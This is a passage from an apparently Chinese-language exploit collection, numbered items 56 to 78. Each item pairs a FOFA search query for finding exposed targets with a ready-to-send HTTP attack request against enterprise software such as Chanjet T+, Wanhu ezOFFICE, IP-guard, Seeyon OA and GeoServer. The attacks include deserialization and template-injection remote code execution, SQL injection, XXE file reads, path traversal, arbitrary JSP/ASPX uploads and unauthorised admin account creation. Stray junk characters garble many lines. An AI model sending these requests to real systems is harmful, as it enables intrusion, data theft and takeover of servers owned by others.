56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE# ?3 ~: v( u) m* v" r9 Z* s
FOFA: app="畅捷通-TPlus"
9 y5 m* ~+ a& |0 iPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
( Q: A7 L P& W2 `3 Y C: z$ {Host: x.x.x.x
: E9 q$ z! U/ v+ u/ kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
, r0 A! N- N, hContent-Type: application/json
- T8 r. Q2 S( ^: q% Z5 P, N. B( Q" Y, i5 h8 O i0 b
{
/ m, C4 J+ D$ x5 ?/ _9 s, L "storeID":{
, R s, Z! I8 _( L' Q "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
" T' q2 \! R& a0 ], z "MethodName":"Start",* [( ^# r8 @' Z: T' d8 \: n
"ObjectInstance":{1 H3 r5 i. y$ P3 K/ Y
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
9 J8 M* x J( e8 y2 x. @; q "StartInfo": {
$ D8 D5 p) e7 J B' Q "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",8 W9 ~3 o+ T, W. v6 ?& c- w% U
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
; \5 M$ T: b& M1 r, k }
, z# u! R$ {1 F C! t$ H; | }
. H1 H5 h" q3 M8 U3 U7 P: x$ q }
- `9 I. k W% P7 l0 T: Y}0 p3 ]1 N& {8 Y' T
0 k% D' u' V+ k
% T& w6 V8 D" {$ D" i( f4 b
57. 畅捷通T+ keyEdit.aspx SQL注入# d) b+ k# y5 a# i( Y3 [
FOFA:app="畅捷通-TPlus"
* s# M! d7 I/ d: T( A7 |GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
2 ~) c' ]% y0 b' FHost: host
9 l0 T) M: P! O: O' WUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36, q* }8 g2 ^. R _( e. e
Accept-Charset: utf-8
6 t! f5 P4 U _. p. D0 e. U( uAccept-Encoding: gzip, deflate
7 W* E' g7 U$ CConnection: close
. \; G3 m7 H$ [9 K z8 B. t7 X2 r2 S( x2 ~
5 T9 s6 d* k. U h S2 X# k58. 畅捷通T+ KeyInfoList.aspx sql注入
; D! z0 A5 |# d2 x8 T$ K1 Z7 sFOFA:app="畅捷通-TPlus"
, b I7 I8 o% c( g6 B& o2 ?7 b, hGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
( t; e3 G1 { D7 ~3 }Host: your-ip* K5 i3 Y1 H- `$ o. T# A0 r: c6 d1 o
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 y3 t: z& M- R+ }+ y1 A
Accept-Charset: utf-8
6 j' Q' K# ]! ]0 H: V8 L9 a; oAccept-Encoding: gzip, deflate9 s( }' G7 G A# j1 e% E( Z
Connection: close
1 i5 j$ R/ M) a* o4 t- C7 d* @3 Q+ H2 S) A3 s0 A9 Z8 z1 Y
s6 P' Z1 ~7 S59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行8 D$ D @7 O6 \4 y( F7 o
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
4 j$ V$ A; d( Z& e" v# uPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
* B6 F# U) ~" W/ [) p( eHost: 192.168.86.128:90906 B- ? p( w3 t$ E
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.363 o# Z2 w. t3 F4 H
Connection: close4 @9 H) h c/ e' n" q/ T3 Q7 }
Content-Length: 16694 _* C+ ]7 s; r& `) T
Accept: */*
7 f3 {: T5 U8 m2 h1 ZAccept-Language: en0 E) ]4 q! ~8 t( |4 i. z
Content-Type: application/x-www-form-urlencoded. v. h& T& C' \8 p% ~# U
Accept-Encoding: gzip
* T3 h- ~: b X, j& k
u4 E6 R5 f8 ]# `1 nPAYLOAD
8 o5 r T3 D* Y1 ^/ R! ~. }0 h/ ], Q+ H( t1 Y8 p: V* p" s3 q
$ f# M; t3 k. J; Q, z0 R
60. 百卓Smart管理平台 importexport.php SQL注入
) ]3 B2 `! T& G4 BFOFA:title="Smart管理平台"
" o* E8 N2 @# I. S/ P8 LGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
( [0 G; u0 K, X3 [ gHost:
+ `/ @ H3 v# W7 e/ u qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
% B5 j. O. v o; T+ G- kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 o: ?: y7 B. \# q: |
Accept-Encoding: gzip, deflate
2 q/ T& s% X; ~# G7 A- [Accept-Language: zh-CN,zh;q=0.9
& K8 r8 u! A. `1 V B" s, uConnection: close
, }+ R& T) S7 Q7 f. g* e8 q+ o0 h
# U% Y" p6 z+ L& @; }$ y- u& I% ^! }; Y; b0 Y( t/ n. O8 Z
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
, @. O7 W3 A% YFOFA: title="欢迎使用浙大恩特客户资源管理系统"
Z2 U! _* k0 n- V9 u$ [1 ~6 oPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1. v2 d/ w4 Q1 Z
Host: x.x.x.x
; O% C- m( G4 a, z: a* CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 ~1 f- C' ~4 G5 h( ^Connection: close
5 j6 i8 C5 D) nContent-Length: 273 v2 K- J3 j- E8 ^5 d& V
Accept: */*7 J. a/ @- m v9 S7 ?
Accept-Encoding: gzip, deflate
. @+ `- l! B; |4 TAccept-Language: en
& p; |, \8 p0 X& O! l2 LContent-Type: application/x-www-form-urlencoded$ N: J% m( s# n8 D) m- K) F
# K( q, w; J/ T
8uxssX66eqrqtKObcVa0kid98xa
4 D, S, H5 i. `3 c" L7 n7 F7 |' z2 w3 I4 ~3 z- }
$ u$ p/ }5 |" R. j b& ~0 i+ l+ j+ M
62. IP-guard WebServer 远程命令执行
- K: P" I% n4 U1 o7 H8 GFOFA:"IP-guard" && icon_hash="2030860561"
; d# J: ^9 X, V# B! |GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.16 M4 o* s, L# f( J* f+ f: |- W
Host: x.x.x.x
3 w _" M1 A% \0 B4 c, S. |# gUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36' q m# n* w, K. W. m* i" n
Connection: close
! B8 g/ `+ v" O: z' l( { IAccept: */*8 r3 ~' }% A: l( a! i1 x: H
Accept-Language: en% L5 R- Q7 W0 j1 ^! l9 ?
Accept-Encoding: gzip
: M( q% l/ l5 M j u; S9 j+ c+ ?! h3 z3 _1 o$ f& I; c: Z" f) [. w+ p. C
! y3 Z7 b1 _5 X3 S访问
. z2 j) S8 B: n$ W5 y* l; R
2 @. y( _3 |1 }$ M2 J: U; v. wGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
1 r s* H" e4 H$ e: k' ^Host: x.x.x.x
0 E, j2 C3 Y6 }% `
6 m R( k, E4 C- J8 @0 O. u
: t1 I- w0 V% R' \# J63. IP-guard WebServer任意文件读取 i* e5 B7 j1 ~) M
IP-guard < 4.82.0609.0
/ }5 S# g# M3 G9 l* S* H1 l# t2 {FOFA:icon_hash="2030860561" b3 Q6 ?7 `; X, E! B7 x0 C7 {( Z
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1% M4 j7 F' c, T! \# \% H5 ^
Host: your-ip
3 T# |/ q4 }( N; i1 R5 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36$ \& [& \+ k$ B: Q- v3 |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7+ Q2 K+ J$ @% Y d# c/ \8 w F
Accept-Encoding: gzip, deflate: E# R3 i+ f. X% K/ d
Accept-Language: zh-CN,zh;q=0.9
7 D+ B( A' H7 A. I4 {* h' D' P8 H' g6 J5 yConnection: close: F5 t9 G, ?' X
Content-Type: application/x-www-form-urlencoded
D o9 z) F/ e1 p- g+ Z. d! _, i, Q( K" C* u
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A0 S. B9 k, p! d7 t
% Z, v" \$ ?; ?64. 捷诚管理信息系统CWSFinanceCommon SQL注入4 u$ u; y+ Y6 E, N2 T
FOFA:body="/Scripts/EnjoyMsg.js"
1 x- w; }) a% ]2 X# `POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
4 U+ c) n& m0 T9 j6 m3 KHost: 192.168.86.128:90019 l( L6 x. Z6 [0 ?& o4 O
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36# b5 c' X- M& E f! _
Connection: close
7 w8 r. Q: k' g- s+ h0 j: W vContent-Length: 369
* I8 A! D2 \9 ^- x8 J( X! r; A8 OAccept: */*
% I! d6 O, ^5 l8 `+ S: kAccept-Language: en
, z/ L1 u' M; {6 B/ |5 J) I/ M1 }Content-Type: text/xml; charset=utf-8$ o! l3 f. p+ o% i d3 u& a$ @
Accept-Encoding: gzip: k# n; W; P `2 B: {7 U! H: B# A
8 C% e5 C' G$ [; d5 Z<?xml version="1.0" encoding="utf-8"?>4 d2 U! Q: \8 }7 v' v
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"># n5 R4 N! c! y O. G# p4 s
<soap:Body>5 W( l2 e- \/ {; }3 }! V3 U; i3 ~
<GetOSpById xmlns="http://tempuri.org/">) c" ^/ ~& Z$ u6 X/ W
<sId>1';waitfor delay '0:0:5'--+</sId>
4 `9 F% Q* _ Q6 z' v/ r4 ` </GetOSpById>. w4 G. Z U% p; h2 S: U
</soap:Body>
, C& [$ I: w1 w. K! S! \% s ~</soap:Envelope>
% Y7 K( `9 f& M7 M2 h' b3 e* v; L; P2 I! M1 w. _
$ p2 p/ l' S. M& ]: T1 c/ I
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过2 ^1 O, b- @* g( U. z
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
# G Q: S; I/ I. |2 y响应200即成功创建账号test123456/123456
3 Z' K7 r% `1 L+ U" M% _POST /SystemMng.ashx HTTP/1.13 u& V1 s) o9 |2 f" i; M
Host:
3 p: `, G0 a- ?- O. B5 c, ^User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
3 G( Y* d3 s) d d5 [' r o' |Accept-Encoding: gzip, deflate4 ~7 K7 s3 {5 d# M- k$ w
Accept: */*
# u, a, }" _% p& MConnection: close. ?' g3 _" h% x/ [% r' b2 K
Accept-Language: en; H( h) v" A/ p* W1 ~( C! g1 p& k. ~( Y
Content-Length: 1747 n z4 f. i- p* V: I
/ _) H( B M$ D+ D, S3 f
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators0 e; s7 A; j" N- z I1 M% L
/ L9 a8 z; ?9 c5 i$ @8 y5 d9 z3 T$ { j2 W% d( ?1 K' q- R
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
" G5 {- x* M5 f! p6 N& y/ R9 L+ ?FOFA:app="万户ezOFFICE协同管理平台", U6 R9 Z% A0 C* u: f
- |6 m* T& Z1 ` j& U3 N" |5 Z
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.10 a$ V' Y8 b p! z1 w, P' H' p
Host: x.x.x.x/ [6 |6 K0 R" L E1 K. i# O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
$ V8 L8 k8 h. h5 r5 \: R5 j& XConnection: close
( q2 J/ S0 h3 Q0 Y P3 JAccept: */*3 e/ P. L2 R% ]
Accept-Language: en, v q( p F' O% o$ f$ i
Accept-Encoding: gzip
5 s% A& c0 C$ u4 ^! h+ x* o$ o" L) s N$ [$ M. E, H0 R
/ p) K' e" I1 o) x+ P! ^
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
0 j0 A( e7 w. R) B( k" j# j$ N/ s9 v
67. 万户ezOFFICE wpsservlet任意文件上传0 g" f$ B& [1 J2 E! J5 b
FOFA:app="万户网络-ezOFFICE"
7 \. k2 q2 R4 c6 nnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型0 }7 W- Q& t3 Q& t. P+ D1 j
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1$ \! ?8 Y, p# S, I' H
Host: x.x.x.x7 K4 c& {& S" _
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0' [" r6 A4 ?4 H* D$ }
Content-Length: 173$ Z* [& F: F+ D& |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
$ U2 f% n1 P- gAccept-Encoding: gzip, deflate' V1 [9 k8 Y5 A) ^! a* D5 s
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
9 R% p I: x; E: B0 }# ?# uConnection: close1 z( _0 d3 F5 K
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
9 |& \; w+ d6 j" C) l/ J: q" Q3 TDNT: 1: ?/ ~! ]6 I! x6 a* _0 q- k$ e
Upgrade-Insecure-Requests: 1, G* D( u; f i- z
- ~2 Q# T6 G9 J$ c( V% s
--ufuadpxathqvxfqnuyuqaozvseiueerp. S+ R: _3 I! c* s
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
- e: x4 M, x$ X7 @8 p" l
8 k1 f( S0 t. o$ K5 @<% out.print("sasdfghjkj");%>
& L* h5 g* V" q5 q--ufuadpxathqvxfqnuyuqaozvseiueerp--
* [9 s1 ~' z2 f. b# F/ f0 w) p, V! q! i: j
) v- q& p6 Z8 t& X8 ^
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
) N( s. e! I: B" Q* I, p7 U' b' o( J& `1 [
68. 万户ezOFFICE wf_printnum.jsp SQL注入
$ u" i* u D1 J! r1 e- F: @FOFA:app="万户ezOFFICE协同管理平台"
) l" Y7 a9 b! o: ?% DGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
$ P7 i' r# E2 H6 eHost: {{host}}
6 `1 j" j+ Q5 x' Z; U' ^+ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.360 K6 F' L" p i, Q
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
& O/ p1 a- u7 Q6 L$ ~0 M& }Accept-Encoding: gzip, deflate5 k) _; P' B/ D2 j/ M
Accept-Language: zh-CN,zh;q=0.9$ J' {# M! @9 E# h( n
Connection: close
8 @* r8 o3 i3 f$ _5 M7 c) D2 c
# j7 a, k- k# ]; \+ G0 F( k, o- z; U6 `, S5 f) l
69. 万户 ezOFFICE contract_gd.jsp SQL注入: g" d" N5 X4 `2 O7 V, G
FOFA:app="万户ezOFFICE协同管理平台"
# l5 M% z7 d$ W% z1 @: |4 [GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.16 h v1 e: v# k U$ d( @
Host: your-ip _' O# S3 M, x
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36& ]6 d% E* L3 q7 J/ Y, i% J4 Y1 M
Accept-Encoding: gzip, deflate
2 A. u7 v8 q0 W$ p7 {% |* eAccept: */*
( A" |; g2 J& G- PConnection: keep-alive6 ]4 F2 ~1 O# L( J4 E
' |3 A: b( c2 N, \2 O4 U4 Y/ X- D$ ~2 j4 |, N
70. 万户ezEIP success 命令执行
3 H' {/ ~, w* r4 [3 _" f( A* LFOFA:app="万户网络-ezEIP"& r$ H* c1 L {; x8 K
POST /member/success.aspx HTTP/1.19 V, k4 [! T" a1 D$ n
Host: {{Hostname}}1 T3 n; X! ~3 {$ Q7 C" T. m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36( c# u/ r1 S! x' q- W3 e" B
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=3 s" A# \3 W* l
Content-Type: application/x-www-form-urlencoded" V8 S+ S% u! f2 @! y$ r1 U2 j+ {
TYPE: C8 ~; g" D1 G3 G2 ]5 I
Content-Length: 167025 @) G0 i8 M# D& F
: c$ m7 {' d' S' p) L9 U2 C# `8 o3 x__VIEWSTATE=PAYLOAD
9 Q$ S+ ~7 b' m; u( Z
3 `$ D6 T4 j4 K# r% _" }) {, U: m! z& c* A3 u
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入4 B' S9 h$ O% H
FOFA:body="PM2项目管理系统BS版增强工具.zip"- D% T! z. i3 O6 Q: |
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1* F& m1 R" q/ m g; g
Host: x.x.x.xx.x.x.x6 d* w8 |- S, f4 l0 Y `* b
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
" X3 R/ h$ \1 p1 W' n$ r& tConnection: close& f$ f( d* {5 t# A( |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 L* Z4 @) M7 X/ z! f
Accept-Encoding: gzip, deflate
' z1 e+ @% q) i; {7 H( NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Q' B5 d+ L k6 n3 [: A8 E
Upgrade-Insecure-Requests: 16 w% C9 P+ p. g
y0 E/ @0 X* p" P: W# E
% ^' W4 _. f8 E. O) ^8 T% e
72. 致远OA getAjaxDataServlet XXE5 Z7 W# j& R+ c j
FOFA:app="致远互联-OA"0 O" D! I/ D: o; M' s8 F& t3 G
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.11 A' S/ o/ U7 G9 H/ y& a
Host: 192.168.40.131:8099
, @5 w* j& }5 XUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36( \: Z5 T9 W6 v$ |
Connection: close% R7 c) p1 D3 w8 i4 n; T' u) u7 y% B
Content-Length: 583
3 ?' D( s2 w, C/ LContent-Type: application/x-www-form-urlencoded
' ?0 K/ y4 @. h" FAccept-Encoding: gzip5 i" S7 o+ q6 s- _& n# I: F/ y& g
* ?+ {( R) ?+ @3 v
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E: ?8 \/ O9 k5 [+ ^) l& n5 O
- B5 R* A* u" ~8 f$ Q F2 ?
1 Y' c$ ~* F4 N. z6 |0 w: L( Q73. GeoServer wms远程代码执行
) v5 e8 D" r4 DFOFA:icon_hash=”97540678”
+ H' L1 S. ^/ [: k6 tPOST /geoserver/wms HTTP/1.1& Q6 ?" l( Q8 J: l+ S
Host:
0 K2 K, ` Z8 C# M+ X8 @- {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& y' p- c# z* n# G; TContent-Length: 19817 [/ |5 o& v; N% }
Accept-Encoding: gzip, deflate
1 q: V' C U; u8 Y: s" x/ I& gConnection: close
! ?# r( X. \. {7 x( ~6 U( ZContent-Type: application/xml9 R% l2 K- D) n: n& d! r; t6 ~
SL-CE-SUID: 3- B4 u5 \$ |* t
+ s1 h6 E# p7 X' |# R( ePAYLOAD
/ J' H4 H5 J" F. h( x" D* ^ }
- X: g. [2 m1 ], M- z- K
) Y7 k- x# ^8 Z2 U2 f/ k( P; t74. 致远M3-server 6_1sp1 反序列化RCE
2 E% u6 ?& E7 C. K. |FOFA:title="M3-Server"1 S3 m# v& f' F# |" H$ d- C9 b8 z
PAYLOAD. W( Z5 n5 k$ g7 H, R
. _) g e- `7 B. b75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
% `: f+ l5 M, G2 C4 jFOFA:app="TELESQUARE-TLR-2005KSH"
; Q. f% I4 s# r$ i) {$ \6 B: F, X' T& nGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1, {! k6 W' k) s; A- v/ k }
Host: x.x.x.x
0 V9 J/ {8 M3 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- }/ d8 D2 {" a; \
Connection: close' Y/ k$ w# f( @6 `& o' [
Accept: */*8 B. _/ S# r1 G! b* r9 e7 [3 H
Accept-Language: en" y- \8 K: Q' ?# e: b4 I4 S
Accept-Encoding: gzip% p" E0 Z1 \' ]( L6 n: _
5 B' O9 A2 d( P
5 h# \- g$ t6 t0 b6 S$ Q; JGET /cgi-bin/test28256.txt HTTP/1.1- h1 n1 K$ O6 K$ H4 z5 I
Host: x.x.x.x
: Q n2 v! Y( D4 h
5 B' Q" j" Z- h s2 h& f' U$ a: W j) v
76. 新开普掌上校园服务管理平台service.action远程命令执行
- e8 `& u/ s; D: `FOFA:title="掌上校园服务管理平台"
8 _2 k, b6 J, R/ [POST /service_transport/service.action HTTP/1.1% [9 K7 v. Z W- ]
Host: x.x.x.x
& ^# D4 i$ y+ z5 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+ V* N P. g1 r" ~' Y2 mConnection: close
7 w: y8 M1 e+ g# \' lContent-Length: 211
- B) o# @" z$ i: D& D' D! \$ DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 o( I7 s2 y* Y- G7 {5 O ~: d
Accept-Encoding: gzip, deflate
0 v) ^ x# O, z+ ]Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ b8 N8 S0 k9 n: Y3 R8 a' f" SCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4; ^; r- L! P- P9 G* t
Upgrade-Insecure-Requests: 1$ G( S! H; ]; J
: a4 {2 ~0 p% ]
{
% |( c/ y) v S" S1 l* B: f"command": "GetFZinfo",
( w! M' G) z" [* g" m) u "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
X; q+ \+ {9 ?1 Z0 p8 o/ V' h ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}", \8 }+ y7 L& a& G0 h' \4 y: w( O
}
# ^* G. _6 Z. s1 Z1 d g' P
1 K3 Y& H8 b$ ?8 p* w2 M! c. c* t. i [7 h0 t3 {
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
1 C |% _, g* G6 v# aHost: x.x.x.x+ I2 ~9 |/ g% t6 c) ~/ W9 }3 O
) i* ]$ K: {6 n: c
+ s4 H+ `) |. D% t4 e
7 q% g% X! z, H& j6 d: o0 E77. F22服装管理软件系统UploadHandler.ashx任意文件上传0 C" C$ o: s3 u" B& Z* c, Y# @- E
FOFA:body="F22WEB登陆"3 P/ t, L: j+ {# T9 [8 ~
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1' E( Z; }) S- d7 z% ^ \
Host: x.x.x.x
& L9 N5 G3 [; X q8 XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.368 ~6 v) g. }. |% f4 j! X' H% u0 g
Connection: close
, _- m1 }+ C; c8 r& V1 GContent-Length: 4338 I& C! l2 a0 v% W- A
Accept: */*
% N! z2 V6 K! ]) V0 o: s3 }. iAccept-Encoding: gzip, deflate
, @& {! M9 s2 e" A" _Accept-Language: zh-CN,zh;q=0.9
% D* ~' e) q( D/ a0 NContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
" \- m/ i5 q `8 |# `" ]% {5 T: _9 t0 F
------------398jnjVTTlDVXHlE7yYnfwBoix
- g! _- `) R# U( U4 PContent-Disposition: form-data; name="folder"; w1 U" C7 v2 n
+ a! O+ X- T- m/upload/udplog
+ ]! Q- Y7 P; f------------398jnjVTTlDVXHlE7yYnfwBoix
( Y, a! H8 b! MContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
9 [* ^$ l# t2 a' A1 f- V- gContent-Type: application/octet-stream
# H; b/ }. T9 t1 }& n; Y2 N
& {" h8 P- I7 d* f3 phello1234567
2 S( V, N" F5 e* D------------398jnjVTTlDVXHlE7yYnfwBoix7 e/ k; g0 ]! W( X0 r. W2 p0 p3 r7 V+ {
Content-Disposition: form-data; name="Upload"
7 c0 R U$ N+ r. V8 n+ ^* q1 O
: ?. w/ a+ W& A% I5 f8 U' S1 ~. T% USubmit Query
* i, p y: M! K% b/ n------------398jnjVTTlDVXHlE7yYnfwBoix--
6 J n8 U: G( Q9 U& H- M- \% }+ O4 d
( Z! _4 |8 e8 |' U$ X/ J
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传( w* d+ U6 `+ U. w( I: @
FOFA:icon_hash="2001627082"
8 y5 [$ v5 z# E' `POST /Platform/System/FileUpload.ashx HTTP/1.1* W7 a. y. r$ J+ ?# Q) k
Host: x.x.x.x# E; C/ ^3 i* F8 l6 @( Y/ [4 `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 f7 |. S% } ~0 ^6 K ]8 \
Connection: close
: E. w! k' a% uContent-Length: 336+ m8 c6 L' Z S* U$ |* y* B
Accept-Encoding: gzip: u7 h) L" V- J6 c. l# b: P
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
' H/ k1 O8 Z h6 F" \$ H! [0 A2 t* i4 n, |
------YsOxWxSvj1KyZow1PTsh98fdu6l
